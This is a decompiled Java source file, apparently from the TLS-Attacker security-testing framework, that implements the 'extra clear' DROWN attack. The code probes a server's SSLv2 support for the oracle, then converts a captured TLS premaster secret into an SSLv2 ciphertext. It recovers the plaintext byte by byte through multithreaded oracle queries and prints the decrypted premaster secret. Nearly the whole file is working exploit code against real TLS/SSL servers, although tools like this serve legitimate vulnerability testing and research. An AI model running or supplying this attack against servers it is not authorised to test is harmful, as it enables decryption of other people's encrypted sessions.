/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.impl.drown;

import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray;
import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.modifiablevariable.util.Modifiable;
import de.rub.nds.tlsattacker.attacks.config.SpecialDrownCommandConfig;
import de.rub.nds.tlsattacker.attacks.constants.DrownVulnerabilityType;
import de.rub.nds.tlsattacker.attacks.exception.AttackFailedException;
import de.rub.nds.tlsattacker.attacks.impl.drown.ExtraClearStep2Callable;
import de.rub.nds.tlsattacker.attacks.impl.drown.ServerVerifyChecker;
import de.rub.nds.tlsattacker.attacks.impl.drown.SievingCoprimePairGenerator;
import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.ExtraClearDrownOracle;
import de.rub.nds.tlsattacker.core.config.Config;
import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
import de.rub.nds.tlsattacker.core.constants.RunningModeType;
import de.rub.nds.tlsattacker.core.constants.SSL2CipherSuite;
import de.rub.nds.tlsattacker.core.protocol.message.SSL2ClientMasterKeyMessage;
import de.rub.nds.tlsattacker.core.protocol.message.SSL2ServerVerifyMessage;
import de.rub.nds.tlsattacker.core.state.State;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
import de.rub.nds.tlsattacker.core.workflow.action.ReceiveAction;
import de.rub.nds.tlsattacker.core.workflow.action.SendAction;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowConfigurationFactory;
import de.rub.nds.tlsattacker.core.workflow.factory.WorkflowTraceType;
import de.rub.nds.tlsattacker.util.ConsoleLogger;
import java.math.BigInteger;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorCompletionService;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

class ExtraClearAttack {
    private Config tlsConfig;
    private ExtraClearDrownOracle oracle;
    private long maxTrimmerCount = 100L;
    private BigInteger serverPublicKey;
    private BigInteger serverModulus;
    private int pmsIndex;
    private BigInteger step1u;
    private BigInteger step1t;
    private static final Logger LOGGER = LogManager.getLogger();

    public ExtraClearAttack(Config tlsConfig) {
        this.tlsConfig = tlsConfig;
        this.oracle = new ExtraClearDrownOracle(tlsConfig);
    }

    public DrownVulnerabilityType checkForExtraClearOracle() {
        SSL2CipherSuite cipherSuite = this.tlsConfig.getDefaultSSL2CipherSuite();
        int clearKeyLength = cipherSuite.getClearKeyByteNumber() + cipherSuite.getSecretKeyByteNumber() - 1;
        byte[] clearKey = new byte[clearKeyLength];
        ModifiableByteArray clearKeyData = Modifiable.explicit((byte[])clearKey);
        SSL2ClientMasterKeyMessage clientMasterKeyMessage = new SSL2ClientMasterKeyMessage();
        clientMasterKeyMessage.setClearKeyData(clearKeyData);
        WorkflowTrace trace = new WorkflowConfigurationFactory(this.tlsConfig).createWorkflowTrace(WorkflowTraceType.SSL2_HELLO, RunningModeType.CLIENT);
        trace.addTlsAction(new SendAction(clientMasterKeyMessage));
        trace.addTlsAction(new ReceiveAction(new SSL2ServerVerifyMessage()));
        State state = new State(this.tlsConfig, trace);
        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(this.tlsConfig.getWorkflowExecutorType(), state);
        workflowExecutor.executeWorkflow();
        if (!WorkflowTraceUtil.didReceiveMessage(HandshakeMessageType.SSL2_SERVER_HELLO, trace)) {
            return DrownVulnerabilityType.NONE;
        }
        SSL2ServerVerifyMessage serverVerifyMessage = (SSL2ServerVerifyMessage)WorkflowTraceUtil.getFirstReceivedMessage(HandshakeMessageType.SSL2_SERVER_VERIFY, trace);
        if (serverVerifyMessage != null && ServerVerifyChecker.check(serverVerifyMessage, state.getTlsContext(), true)) {
            return DrownVulnerabilityType.SPECIAL;
        }
        return DrownVulnerabilityType.SSL2;
    }

    public void execute(List<byte[]> premasterSecrets, SpecialDrownCommandConfig config) {
        this.initRsaParams();
        byte[] c1 = null;
        this.pmsIndex = 0;
        for (byte[] secret : premasterSecrets) {
            byte[] step1Result = this.step1(secret);
            if (step1Result != null) {
                c1 = step1Result;
                break;
            }
            ++this.pmsIndex;
        }
        if (c1 == null) {
            throw new AttackFailedException("Could not convert any Premaster secret to an SSLv2-conformant ciphertext");
        }
        ConsoleLogger.CONSOLE.info("Step 1 completed, converted Premaster secret #" + this.pmsIndex + " to ENCRYPTED-KEY-DATA");
        byte[] m1 = this.step2(c1);
        if (m1 == null) {
            throw new AttackFailedException("Could not determine plaintext for converted ciphertext");
        }
        ConsoleLogger.CONSOLE.info("Step 2 completed, determined plaintext for converted ciphertext");
        byte[] m0 = this.step3(m1);
        ConsoleLogger.CONSOLE.info("Step 3 completed, converted SECRET-KEY-DATA back to Premaster secret");
        ConsoleLogger.CONSOLE.info("(Padded) plaintext Premaster secret #" + this.pmsIndex + " is:" + ArrayConverter.bytesToHexString((byte[])m0, (boolean)true, (boolean)true));
    }

    private void initRsaParams() {
        WorkflowTrace trace = new WorkflowConfigurationFactory(this.tlsConfig).createWorkflowTrace(WorkflowTraceType.SSL2_HELLO, RunningModeType.CLIENT);
        State state = new State(this.tlsConfig, trace);
        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(this.tlsConfig.getWorkflowExecutorType(), state);
        workflowExecutor.executeWorkflow();
        this.serverPublicKey = state.getTlsContext().getServerRSAPublicKey();
        if (this.serverPublicKey == null) {
            throw new AttackFailedException("Could not get server public key");
        }
        this.serverModulus = state.getTlsContext().getServerRsaModulus();
        if (this.serverModulus == null) {
            throw new AttackFailedException("Could not get server modulus");
        }
    }

    private byte[] step1(byte[] premasterSecret) {
        BigInteger c0 = new BigInteger(premasterSecret);
        BigInteger e = this.serverPublicKey;
        BigInteger N = this.serverModulus;
        SievingCoprimePairGenerator pairGenerator = new SievingCoprimePairGenerator(this.maxTrimmerCount);
        while (pairGenerator.hasNext()) {
            BigInteger t;
            BigInteger[] pair = (BigInteger[])pairGenerator.next();
            BigInteger u = pair[0];
            BigInteger s = u.multiply((t = pair[1]).modInverse(N));
            BigInteger c1 = c0.multiply(s.modPow(e, N)).mod(N);
            byte[] ciphertext = c1.toByteArray();
            if (!this.oracle.checkPKCSConformity(ciphertext)) continue;
            this.step1u = u;
            this.step1t = t;
            return ciphertext;
        }
        return null;
    }

    private byte[] step2(byte[] c1) {
        SSL2CipherSuite cipherSuite = this.tlsConfig.getDefaultSSL2CipherSuite();
        BigInteger e = this.serverPublicKey;
        BigInteger N = this.serverModulus;
        int l_m = this.serverModulus.bitLength() / 8;
        BigInteger B = BigInteger.valueOf(2L).modPow(BigInteger.valueOf(8 * (l_m - 2)), N);
        int l_k = cipherSuite.getSecretKeyByteNumber();
        BigInteger RExponent = BigInteger.valueOf(8 * l_k);
        BigInteger R = BigInteger.valueOf(2L).modPow(RExponent, N);
        BigInteger RInverse = R.modInverse(N);
        byte[] ciphertext = c1;
        BigInteger knownPlaintext = BigInteger.valueOf(2L).multiply(B);
        int knownLength = 2;
        int shiftCount = 0;
        if (this.step1u.compareTo(this.step1t) > 0) {
            knownPlaintext = knownPlaintext.multiply(this.step1u).divide(this.step1t).mod(N);
        }
        byte[] newPlaintext = this.recoverPlaintext(ciphertext);
        knownPlaintext = ExtraClearAttack.updateKnownPlaintext(knownPlaintext, newPlaintext);
        knownLength += newPlaintext.length;
        int threadNumber = Runtime.getRuntime().availableProcessors();
        LOGGER.info("Using " + threadNumber + " threads for step 2");
        ExecutorService executor = Executors.newFixedThreadPool(threadNumber);
        BigInteger sCandidateStep = BigInteger.valueOf(threadNumber * 2);
        while (knownLength < l_m) {
            int i;
            knownPlaintext = knownPlaintext.multiply(RInverse).mod(N);
            BigInteger shiftedCiphertext = new BigInteger(ciphertext).multiply(RInverse.modPow(e, N)).mod(N);
            ciphertext = ExtraClearAttack.ensurePositive(shiftedCiphertext.toByteArray());
            ++shiftCount;
            ExecutorCompletionService<BigInteger> completionService = new ExecutorCompletionService<BigInteger>(executor);
            ArrayList<ExtraClearStep2Callable> allCallables = new ArrayList<ExtraClearStep2Callable>();
            ArrayList<Future<BigInteger>> allFutures = new ArrayList<Future<BigInteger>>();
            BigInteger s = null;
            for (i = 0; i < threadNumber; ++i) {
                BigInteger bigInteger = BigInteger.valueOf(1 + i * 2);
                ExtraClearStep2Callable callable = new ExtraClearStep2Callable(this.oracle, ciphertext, l_m, e, N, bigInteger, sCandidateStep, knownPlaintext);
                allCallables.add(callable);
                allFutures.add(completionService.submit(callable));
            }
            for (i = 0; i < threadNumber; ++i) {
                try {
                    s = (BigInteger)completionService.take().get();
                }
                catch (InterruptedException interruptedException) {
                    interruptedException.printStackTrace();
                }
                catch (ExecutionException executionException) {
                    throw new RuntimeException(executionException);
                }
                if (s != null) break;
            }
            for (Future future : allFutures) {
                future.cancel(true);
            }
            if (s == null) {
                LOGGER.error("Could not find multiplicator during iterative recovery");
                return null;
            }
            byte[] multipliedCiphertext = ArrayConverter.bigIntegerToByteArray((BigInteger)s.modPow(e, N).multiply(new BigInteger(ciphertext)).mod(N), (int)l_m, (boolean)true);
            byte[] byArray = this.recoverPlaintext(multipliedCiphertext);
            BigInteger byteModuloExponent = BigInteger.valueOf(byArray.length).multiply(BigInteger.valueOf(8L));
            BigInteger byteModulo = BigInteger.valueOf(2L).modPow(byteModuloExponent, N);
            BigInteger numOfSubstractions = knownPlaintext.multiply(s).divide(N);
            BigInteger sInverse = s.modInverse(byteModulo);
            BigInteger b = new BigInteger(ExtraClearAttack.ensurePositive(byArray)).add(numOfSubstractions.multiply(N).mod(byteModulo));
            BigInteger computedPlainLastBytes = b.multiply(sInverse).mod(byteModulo);
            newPlaintext = ArrayConverter.bigIntegerToByteArray((BigInteger)computedPlainLastBytes, (int)byArray.length, (boolean)true);
            knownPlaintext = ExtraClearAttack.updateKnownPlaintext(knownPlaintext, newPlaintext);
            LOGGER.info("Step 2: Recovered " + (knownLength += l_k) + " of " + l_m + " bytes");
        }
        executor.shutdownNow();
        BigInteger finalPlaintext = knownPlaintext;
        for (int i = 0; i < shiftCount; ++i) {
            finalPlaintext = finalPlaintext.multiply(R).mod(N);
        }
        return finalPlaintext.toByteArray();
    }

    private byte[] step3(byte[] m1) {
        BigInteger N = this.serverModulus;
        BigInteger step1s = this.step1u.multiply(this.step1t.modInverse(N));
        BigInteger sInverse = step1s.modInverse(N);
        BigInteger m0 = new BigInteger(ExtraClearAttack.ensurePositive(m1)).multiply(sInverse).mod(N);
        return ExtraClearAttack.ensurePositive(m0.toByteArray());
    }

    private byte[] recoverPlaintext(byte[] encryptedKeyData) {
        SSL2CipherSuite cipherSuite = this.tlsConfig.getDefaultSSL2CipherSuite();
        byte[] plaintext = new byte[]{};
        for (int i = 0; i < cipherSuite.getSecretKeyByteNumber(); ++i) {
            byte newByte = this.oracle.bruteForceKeyByte(encryptedKeyData, plaintext);
            plaintext = Arrays.copyOf(plaintext, plaintext.length + 1);
            plaintext[plaintext.length - 1] = newByte;
        }
        byte[] delimitedPlaintext = new byte[plaintext.length + 1];
        System.arraycopy(plaintext, 0, delimitedPlaintext, 1, plaintext.length);
        return delimitedPlaintext;
    }

    private static BigInteger updateKnownPlaintext(BigInteger oldPlaintext, byte[] newBytes) {
        byte[] plainBytes = ExtraClearAttack.ensurePositive(oldPlaintext.toByteArray());
        System.arraycopy(newBytes, 0, plainBytes, plainBytes.length - newBytes.length, newBytes.length);
        return new BigInteger(plainBytes);
    }

    protected static byte[] ensurePositive(byte[] data) {
        byte[] positiveData = new byte[data.length + 1];
        System.arraycopy(data, 0, positiveData, 1, data.length);
        return positiveData;
    }
}

